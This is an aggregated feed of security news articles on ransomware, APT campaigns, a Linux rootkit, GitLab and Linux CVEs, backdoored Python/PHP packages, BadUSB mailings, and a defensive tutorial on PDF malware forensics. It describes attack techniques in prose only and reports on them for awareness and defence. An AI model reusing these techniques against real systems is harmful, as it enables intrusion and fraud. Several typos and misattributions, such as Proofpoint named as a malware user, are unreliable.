The post <strong>The new version of Hello XD ransomware, developed by Russian hackers, becomes undetectable by using a backdoor</strong> appeared first on Information Security Newspaper | Hacking News.
]]>Experts at Palo Alto Networks report that the creator of this malware variant developed a new encryptor focused on bypassing detection and changes in the encryption algorithm, which has put Hello XD far ahead of Babuk and other similar malware strains, significantly increasing its effectiveness.
As mentioned by Palo Alto experts, Hello XD was developed by a presumably Russian threat actor identified as X4KME, known for publishing various online tutorials for the implementation of Cobalt Strike for malicious purposes.
Unlike other ransomware operations, Hello XD does not use a site on the Tor network to publish victims’ leaked information, but instead carries out a negotiation process through the TOX chat service. In addition, the latest version of the malware adds a still-in-development onion website in the ransom note shown to victims, so it is unknown for what purpose it will be created.
In addition to the new encryptor, the attacker developer of Hello XD included MicroBackdoor, an open-source backdoor that allows hackers to navigate the infected system, execute arbitrary commands and remove any trace of malicious activity. The backdoor executable is encrypted with the WinCrypt API along with the encryption malware payload.
On the other hand, the payload packer has two layers of obfuscation. The malware developer derived the encryptor by modifying UPX, an open-source packager widely used by other malware developers.
The decryption of embedded blobs requires a custom algorithm with unconventional instructions such as XLAT, while API calls in the packager are not obfuscated. Hello XD also changed its encryption algorithm from HC-128 and Curve25519-Dona to Rabbit Cipher and Curve2519-Donna.
Experts believe that the features added to the new version of Hello XD could make it one of the dominant ransomware variants over the next few months, so it’s important for the cybersecurity industry to stay on top of the development received by this malware.
Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.
The post <strong>The new version of Hello XD ransomware, developed by Russian hackers, becomes undetectable by using a backdoor</strong> appeared first on Information Security Newspaper | Hacking News.
]]>The post Education and telecommunication organizations based in Singapore, Hong Kong, Vietnam, Cambodia, and Australia were being spied on since 2013 appeared first on Information Security Newspaper | Hacking News.
]]>The main attack method, employed by this group between 2012 and 2015, involves Microsoft Office documents specially crafted for the exploitation of known vulnerabilities such as CVE-2012-0158 and CVE-2010-3333. This tactic was first detected in 2014, in a phishing campaign associated with the Advanced Persistent Threat (APT) operation known as Naikon.
SentinelLabs identified a second hacking method associated with Aoqin Dragon, based on hiding malicious executables in icons of fake antivirus products. After execution, a malware sample was delivered to the affected systems.
Starting in 2018, hackers left these tactics behind to resort to using a removable disk shortcut file; clicking this icon triggers a DLL hijack and loads an encrypted payload to deliver a backdoor. This malware runs under the name “Evernote Tray Application” and is executed at system startup; if any removable drives are detected, a copy of the payload will be created to expand the infection.
At least two backdoor variants used by this group have been identified. Known as Mongall, the first backdoor is a DLL injected into memory, protected with encryption and in constant maintenance since its launch in 2013. This backdoor profiles the host and sends the details to the C&C using an encrypted channel.
Moreover, Heyoka is an open source exfiltration tool that uses spoofed DNS requests to create a two-way communication tunnel. Hackers employ Heyoka by copying files from compromised devices to prevent affected system administrators from detecting malicious activity in its early stages.
Aoqin Dragon is an unusual case, as it managed to go unnoticed for almost ten years. This has been possible due to the continuous evolution of its strategies and the periodic change of tactics, so it is highly likely that this cybercriminal group will change its behavior again in the near future.
Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.
The post Education and telecommunication organizations based in Singapore, Hong Kong, Vietnam, Cambodia, and Australia were being spied on since 2013 appeared first on Information Security Newspaper | Hacking News.
]]>The post New rootkit malware for Linux is undetectable and is quickly spreading throughout Latin America. Protect your servers before it’s too late appeared first on Information Security Newspaper | Hacking News.
]]>The main feature of Symbiote is that it requires infecting other running processes to achieve a successful engagement. Instead of using an executable as any conventional malware variant would, hackers use a shared object (SO) library loaded into running processes through LD_PRELOAD, thus infecting vulnerable systems.
After infecting running processes on the system, Symbiote provides its operators with rootkit functionalities, in addition to remote access and credential collection capabilities.
Researchers first detected the malware in November 2021, attributing its development to hacking groups against the financial sector in Latin America. By infecting a target system, Symbiote hides any hint of malicious activity, making infections virtually undetectable, even using forensic analysis techniques.
In addition to rootkit tactics, the malware also implants a backdoor in the system so that operators can log in like any user using an encrypted password and thus execute commands with high privileges.
Another interesting feature about Symbiote is its Berkely Packet Filter (BPF) hook functionality, employed by other malware variants to cover up your C&C communications. However, Symbiote uses BPF to hide malicious network traffic on infected systems.
If an administrator launches any packet capture tool on the affected Linux system, the BPF bytecode is injected into the kernel that defines which packets should be captured. In this process, Symbiote first adds its bytecode so that it can filter the network traffic it wants to hide.
This malware is highly stealthy. According to experts, Symbiote is designed to be loaded through the LD_PRELOAD directive, allowing it to be loaded before any other shared object. Thanks to it loading first, it can hijack imports from other library files uploaded for the application.
Symbiote uses this to hide its presence on the machine by connecting the libc and libpcap functions. The following screenshot shows the various malware evasion tactics:
Because Symbiote works as a user-level rootkit, it can be difficult to detect an infection. Network telemetry can be used to detect anomalous DNS requests, and security tools such as antivirus must be statically linked to ensure that they are not “infected” by user rootkits. Infection vectors are still unknown, so Linux system administrators should remain vigilant for any hint of infection.
Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.
The post New rootkit malware for Linux is undetectable and is quickly spreading throughout Latin America. Protect your servers before it’s too late appeared first on Information Security Newspaper | Hacking News.
]]>The post 8 critical vulnerabilities in GitLab would allow hackers to install backdoors in your code appeared first on Information Security Newspaper | Hacking News.
]]>According to the report, GitLab fixed a total of eight vulnerabilities of all severity ranges, which exploitation would have allowed threat actors to deploy multiple hacking scenarios, including cross-site scripting (XSS), privilege escalation attacks, and even the installation of backdoors in GitLab projects. Detected and addressed flaws are described below, along with their tracking key and score assigned according to the Common Vulnerability Scoring System (CVSS).
Account takeover via SCIM email change: When setting up group SAML SSO, the SCIM feature would allow any owner of a Premium group to invite arbitrary users through their username and email address to subsequently change users’ email addresses through SCIM to a hacker-controlled address and take control of the affected account due to the absence of multi-factor authentication measures. The flaw received a CVSS score of 9.9/10 and was tracked as CVE-2022-1680.
XSS stored in Jira: A store cross-site scripting (XSS) error in Jira would allow threat actors to execute arbitrary JavaScript code in GitLab through specially crafted Jira issues. The flaw was tracked as CVE-2022-1940 and received a CVSS score of 7.7/10.
XSS attack in quick actions: The absence of input validation in quick actions would allow threat actors to exploit an XSS bug by injecting HTML into contact details. The flaw received a CVSS score of 8.7/10 and received the tracking key CVE-2022-1948.
IP allowlist bypassing when using Activation Tokens: Incorrect authorization in GitLab EE would allow threat actors to misuse an activation token from any location, even evading IP address restrictions. The flaw received a CVSS score of 6.5/10 and was tracked as CVE-2022-1935.
IP allowlist bypassing when using Project Deployment Tokens: Improper authorization in GitLab would have allowed malicious hackers using project deployment tokens to access from any location, even with IP address restrictions enabled. The flaw was tracked as CVE-2022-1936 and received a CVSS score of 6.5/10.
Incorrect authorization in Interactive Web Terminal: When the Interactive Web Terminal feature is configured, incorrect authorization would allow users with the Developer role to open terminals in running jobs of other developers, potentially exposing these jobs to hacking scenarios. The vulnerability was tracked as CVE-2022-1944 and received a CVSS score of 5.4/10.
Subgroup members can list members of the parent group: An issue in all versions of GitLab CC/EE would allow a member of the subgroup to access the list of members of their parent group. The vulnerability received a CVSS score of 4.3/10 and was tracked as CVE-2022-1821.
Group member lock bypass: Malicious group maintainers could add new members to a project within their group via REST APIs, even after group owners enable settings to prevent members from being added to projects within the group. The flaw was tracked as CVE-2022-1783 and received a CVSS score of 2.7/10.
GitLab adds that these fixes are part of its effort to maintain the highest security standards and improve the user experience. For more information, users can visit the FAQ section of GitLab, where more detailed descriptions of every single flaw and its corresponding security patches are found.
The code hosting and development service also offers its users to receive security notifications directly in their inbox through their contact page. To receive notifications of new update releases via RSS, GitLab users can subscribe to the GitLab Security Release RSS feed.
Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.
The post 8 critical vulnerabilities in GitLab would allow hackers to install backdoors in your code appeared first on Information Security Newspaper | Hacking News.
]]>The post Popular Python package ctx Python and PHP library were compromised and injected with a backdoor appeared first on Information Security Newspaper | Hacking News.
]]>As reported just a few hours ago, the package received an update version identified as v0.2.6, which attracted attention because ctx Python had not received updates in 8 years.
After the update was reflected in the GitHub repository, some researchers began analyzing the code, finding some exciting features:
This code is specially crafted for when creating a dictionary; all its environment variables are sent to a URL of the Heroku application under attackers’ control.
Experts consider this a clear sign that the current version of the package has been manipulated for malicious purposes and should not be used.
Other versions of a ‘phpass’ fork, published in the Packagist repository, were also manipulated to add this malicious code. PHPass has reportedly been downloaded about 2.5 million times.
According to security researcher Somdev Sangwan, the insertion of this backdoor could be aimed at extracting access credentials for Amazon Web Services (AWS).
The malicious version was released on May 14, so users who installed the package before that date are employing the original version (v0.1.2) and will not be affected by this issue. On the other hand, any installation of ctx Python after May 14 could include malicious code.
About the attack method, specialists mention that the domain name of the original maintainers of ctx Python expired, which would have allowed the attackers to register it again and take control of this package, adding the malicious payload for later distribution.
The official page of the ctx Python project in PyPI has been removed, showing the error ‘Not Found’ to visitors.
Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.
The post Popular Python package ctx Python and PHP library were compromised and injected with a backdoor appeared first on Information Security Newspaper | Hacking News.
]]>The post 2 critical vulnerabilities in the Linux operating system allow backdoors to be installed with root privileges appeared first on Information Security Newspaper | Hacking News.
]]>Nimbuspwn refers to the CVE-2022-29799 and CVE-2022-29800 flaws, which reside in networkd-dispatcher, a component that sends connection state changes on Linux machines. The flaws were discovered during an analysis of messages on the system bus, which led to a review of the code flow for networkd-dispatcher.
Microsoft researcher Jonathan Bar Or mentions that this set of flaws involves issues such as path traversal errors, symbolic link race conditions, and time-of-check-time-to-use (TOCTOU) race conditions. Additionally, during analysis it was observed that the network-dispatcher daemon was running with root privileges at system boot time.
Microsoft discovered that the daemon used a method called “_run_hooks_for_state” to discover and run scripts based on the state of the detected network.
The logic of this method includes returning executable scripts owned by the root user and the root group in the “_run_hooks_for_state” directory. The method executes each script in the above location using subprocess.Popen, while providing custom environment variables.
The execution of “_run_hooks_for_state” is what leads to the appearance of these security problems, as reported by Microsoft. Exploitation of Nimbuspwn would allow a threat actor with reduced privileges on the affected Linux system to escalate their privileges to the root level by sending arbitrary signals.
A description of the steps for a successful exploitation is shown in the following diagram, divided into three attack steps:
Microsoft specifies that successful exploitation requires planting various files on the affected system.
The report concludes by mentioning that there are many environments where the attack is feasible, including Linux Mint because the systemd-networkd service which normally has the bus name “org.freedesktop.Network1” is not started on boot by default. .
To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.
The post 2 critical vulnerabilities in the Linux operating system allow backdoors to be installed with root privileges appeared first on Information Security Newspaper | Hacking News.
]]>The post Advance NSA backdoor detected in 245 organizations in 45 countries including China, India and Mexico appeared first on Information Security Newspaper | Hacking News.
]]>The first reports indicated that only an antivirus engine was able to detect a sample of Bvp47, although with the passage of the hours more indicators of compromise have been known, which will considerably improve the detection of this security threat.
The backdoor was first identified by Chinese security firm Pangu Lab, describing it as an advanced development for Linux with remote access capabilities protected through an RSA asymmetric cryptography algorithm, which requires a private key for enablement. This malware would have impacted almost 300 organizations in 45 countries, going unnoticed for almost 10 years.
This private key was found in leaks published by Shadow Brokers hackers, in addition to other hacking tools and zero-day exploits used by Equation Group. The backdoor could also operate on major Linux distributions, including JunOS, FreeBSD, and Solaris.
A subsequent automated analysis seems to confirm the authorship of Bvp47, as it shares multiple features with another backdoor developed by Equation Group. According to Kaspersky experts, this backdoor shares 30% of the code strings with other malware identified in 2018 and available in virusTotal databases.
On the Bvp47 attack, the researchers point out that the threat actors control 3 servers, one responsible for the external attacks and two other internal machines in charge of an email server and a business server.
Attackers establish a connection between the external server and the email server via a TCP SYN packet with a payload of 264 bytes. The email server then connects to the commercial server’s SMB service to perform some sensitive operations, including running PowerShell scripts.
The trading server then connected to the email server for the download of additional files, including the Powershell script and the encrypted data from the second stage. The connection between the internal machines allows the transmission of encrypted data through a specialized protocol.
To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.
The post Advance NSA backdoor detected in 245 organizations in 45 countries including China, India and Mexico appeared first on Information Security Newspaper | Hacking News.
]]>The post Squirrelwaffle malware takes control of vulnerable Microsoft Exchange servers to spread banking scam appeared first on Information Security Newspaper | Hacking News.
]]>About Squirrelwaffle, the researchers mention that this is a malware loader distributed as a malicious Microsoft Office document in spam campaigns. This tool allows threat actors to gain access to the victim’s system and facilitates the delivery of malware variants for later attack stages, including phishing and banking fraud.
If a target user opens an email with an infected attachment and enables macros, a Visual Basic script is executed for the Cobalt Strike Beacons download, giving hackers full control of the vulnerable system.
Although this is a well-known hacking variant, Squirrelwaffle’s latest operation stands out on its own merits. While conventional attacks are cut short by applying security updates, the use of email threads in this last incident allowed hackers to maintain the attack persistently, so not even the application of security patches stopped the intrusion.
Using the information contained in these emails, the hackers registered a web domain deceptively similar to a legitimate platform, using a small misspelling to avoid detection. Taking the conversation out of the victim’s email infrastructure allowed the attackers to calmly carry out the rest of the process.
The next step only involved sending malicious emails to the conversation, trying to trick finance employees into making transfers to bank accounts controlled by the hackers. The use of other methods, such as creating more deceptive domains, made this deception almost undetectable, as seen below:
In a supposed follow-up email included in the thread, reference is made to the new bank details and attempts are made to create a sense of urgency in the minds of the attacked employees. In the operation detected by Sophos, threat actors continued to seek to obtain bank transfers sent fake urgent messages.
After days of exerting pressure, the hackers are finally informed that the payment is being processed.
According to Sophos, the theft was about to take place, although one of the financial institutions involved detected signs of electronic fraud and the transfer was interrupted.
This is an even more complex variant of a known attack, so it is necessary to take action on it. To begin with, it is best to apply all the updates available for your system, in addition to applying email security policies that help prevent members of an organization from interacting with malicious content.
To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.
The post Squirrelwaffle malware takes control of vulnerable Microsoft Exchange servers to spread banking scam appeared first on Information Security Newspaper | Hacking News.
]]>The post APT group TA2541 has been targeting thousands of organizations across aviation, aerospace, transportation, manufacturing, and defense industries worldwide appeared first on Information Security Newspaper | Hacking News.
]]>Unlike other similar groups, TA2541 does not usually use current events, topics of general interest or false promotions to attract potential victims. Instead, this group draws on topics related to transportation, aviation, commercial flights, tourism, and the airline industry in general. This campaign has been detected in countries in North America, Europe, Asia and the Middle East.
Below we can see an example of the emails sent by these hackers:
Proofpoint researchers detected that the emails used by this group contained a Google Drive URL to redirect affected users to an obfuscated Visual Basic Script (VBS) file; when executed, an executable file is extracted in text hosted on platforms such as Pastetext or GitHub.
Hackers run PowerShell on various Windows processes and query Windows Management Instrumentation (WMI) to search for security products on the affected system and try to disable them. Finally, hackers will collect information from the affected system before installing the RAT.
In addition to Google Drive, threat actors also use Discord links that redirect users to compressed files to AgentTesla or Imminent Monitor. TA2541 has also resorted to delivering attachments in emails that contain embedded executables containing the malicious URL.
VBS files are used to restore persistence with an AsyncRAT payload by adding the VBS file to the home directory pointing to a PowerShell script.
Experts also report that TA2541 has used more than a dozen different malware payloads since its emergence on the cybercriminal scene. Proofpoint has always resorted to commercial malware available for sale on criminal forums or in code repositories. While hackers currently mainly use AsyncRAT, they have also used other variants such as NetWire, Parallax or WSH RAT.
Given the characteristics of the malware variants used by this group, the researchers believe that these campaigns have as their main purpose the collection of information and remote access to infected systems. However, the researchers have not been able to confirm what the real goals of this group are.
This group has been a constant threat for the past few years and is highly likely to remain so in the medium term, so system administrators will need to remain alert to any potential ATTACK attempts related to TA2541.
To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.
The post APT group TA2541 has been targeting thousands of organizations across aviation, aerospace, transportation, manufacturing, and defense industries worldwide appeared first on Information Security Newspaper | Hacking News.
]]>The post Clients using Magento 1 e-commerce platform are getting hacked appeared first on Information Security Newspaper | Hacking News.
]]>This wave of attacks was reported this week by security firm Sansec, which released a report revealing that hundreds of stores were compromised by a skimming tool loaded from the domain naturalfreshmall.com.
The company asked victims to contact their support area to find a common entry point and protect other traders against a potential new attack. Adobe also mentions that the first stage of investigation has already been completed, so it is known that the attackers used a combination of SQL injection and PHP object injection (POI) to take control of the vulnerable software.
It is important to remember that Adobe has stopped supporting Magento software, although this has not been an impediment for thousands of e-commerce websites to continue using it.
By analyzing one of the intrusions in detail, the researchers found that the attackers left 19 backdoors on the target system, so they recommended victims use a malware scanning solution to identify all instances of malicious files or compromised Magento code.
Since its launch, Magento has created constant problems for Adobe and its thousands of users. At the end of 2021, cybersecurity specialists reported that more than 4,000 online stores would have been compromised by hacking groups exploiting known vulnerabilities in Magento, which would have represented losses of hundreds of thousands of dollars.
In addition, in 2020 Sansec also reported hundreds of attacks against Magento online stores, while by then Adobe already foresaw massive attacks against Magento 1.x implementations, although they were confident that versions 2.x could be considered safe.
To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.
The post Clients using Magento 1 e-commerce platform are getting hacked appeared first on Information Security Newspaper | Hacking News.
]]>The post Hackers are mailing ransomware-infected USB devices to employees of hundreds of companies to take control of their networks appeared first on Information Security Newspaper | Hacking News.
]]>The cybercriminals reportedly used the U.S. Postal Service (USPS) and the United Parcel Service (UPS) network to ship BadUSB or Bad Beetle USB devices, used to obtain an entry point to potentially affected organizations.
The agency details how the attackers of the attack posed as members of Amazon and the U.S. Department of Health and Human Services (HHS), tricking affected users into opening the packages and connecting these devices to their work computers.
To get users to connect the USB device, hackers pretend they contain government files on COVID-19 measures, or fake gift cards for online services.
When victims connect these devices to their computers, the affected computer is registered as a Human Interface Device (HID) keyboard, which will allow the device to work even with the unused malicious USB devices. Once this configuration is done, hackers inject keystrokes to install malware payloads.
As mentioned above, the main goal of this campaign is to inject various ransomware variants into the affected systems. To do this, hackers use tools such as Metsploit, Cobalt Strike, the Griffon backdoor and some PoweShell scripts, in addition to ransomware variants such as BlackMatter and REvil. At the moment the real scope of the attack is unknown, although it is not ruled out that there are hundreds of organizations affected.
This report comes after the FBI detailed an operation in which FIN7 posed as Best Buy to send similar packages with malicious flash drives through USPS to hotels, restaurants and retailers. Reports of such attackers began to emerge in February 2020, stretching for nearly two years.
To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.
The post Hackers are mailing ransomware-infected USB devices to employees of hundreds of companies to take control of their networks appeared first on Information Security Newspaper | Hacking News.
]]>The post How to perform digital forensics of malicious PDF files? Easily checking if a PDF document has malware or backdoors appeared first on Information Security Newspaper | Hacking News.
]]>This time, specialists from the International Institute of Cyber Security (IICS) will show you how to apply digital forensics to analyze PDF documents and determine if they are compromised with any variant of malicious content.
Before keep going, it is worth recalling that the attack chain via PDF usually begins by sending malicious documents via email. When these documents are opened on the affected system, in most cases JavaScript code is executed in the background capable of exploiting vulnerabilities in tools such as Adobe PDF Reader or storing executable files for later attack stages.
PDF documents, whether legitimate or malicious, have 4 main elements, mention digital forensics experts:
Now that we know the essential information about an attack via PDF documents, we will be able to review each way to analyze these elements.
PDFiD is a component of Didier Stevens Suite capable of scanning PDF documents using a string list to detect JavaScript elements, embedded files, actions when opening files, and counting specific lines in a document.
In this example, we can see that PDFiD detected various objects, flows, JavaScript code, and OpenAction elements in the Report.pdf file. According to digital forensics experts, the presence of these elements suggests that the analyzed file contains JavaScript or Flash scripts. The /Embedded element indicates the presence of other formats within PDFs, while the /OpenAction, AA, and /Acroform elements initiate automatic actions when opening the file.
We already know that there is JavaScript code inside the parsed PDF file. This will be the starting point of the research; to find an indirect JavaScript object, run the pdf-parser.py tool.
Based on the result of these scans, the hidden JavaScript code will execute the malware every time the file is opened, so the next step is to extract the malicious payload.
This is a Python tool that contains all the necessary components for the validation and analysis of PDF files, mentioned digital forensics experts. To take full advantage of its capabilities enter the peepdf – i file_name.pdf command. The -i function will enable the interactive mode of the script:
To find more features, enter the –help command:
The scan result indicates that there is a file embedded in object 14. A closer inspection of this object allows you to see that it points to object 15; in turn, object 15 points to object 16. Finally, there are indications of the presence of a malicious file on object 17.
According to the content of the PDF, there is only one sequence in it, which also points to object 17. Therefore, object 17 is a sequence with an embedded file.
Stream 17 contains a file signature that begins with MZ and a hexadecimal value that begins with 4d 5a. According to digital forensics experts, these are signs that point to an executable file.
Next, we will save the sequence as a virus.exe executable.
Run the file in sup-tuals-tion using a 32-bit Windows 7 system.
As you can see from the Process Explorer window, virus.exe created two suspicious processes (zedeogm.exe, cmd.exe) that were interrupted after starting.
According to Process Monitor, the zedeogm.exe file was saved within running processes. Then he changed the rules set in Windows Firewall. The next step was to run the WinMail.exe file; after that, the program launched cmd.exe to run the tmpd849fc4d.bat file and stop the process.
The use of digital forensics techniques for the analysis of PDF documents can be essential to avoid interacting with malicious content. Together with other preventive measures, this practice can close one of the main vectors of threats today.
Other recommended measures to prevent this threat include:
As usual, we remind you that this material was prepared for informational purposes only and should not be taken as a call to action. IICS is not responsible for the misuse that may occur to the information contained herein.
To learn more about information security risks, malware variants, digital forensics, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.
The post How to perform digital forensics of malicious PDF files? Easily checking if a PDF document has malware or backdoors appeared first on Information Security Newspaper | Hacking News.
]]>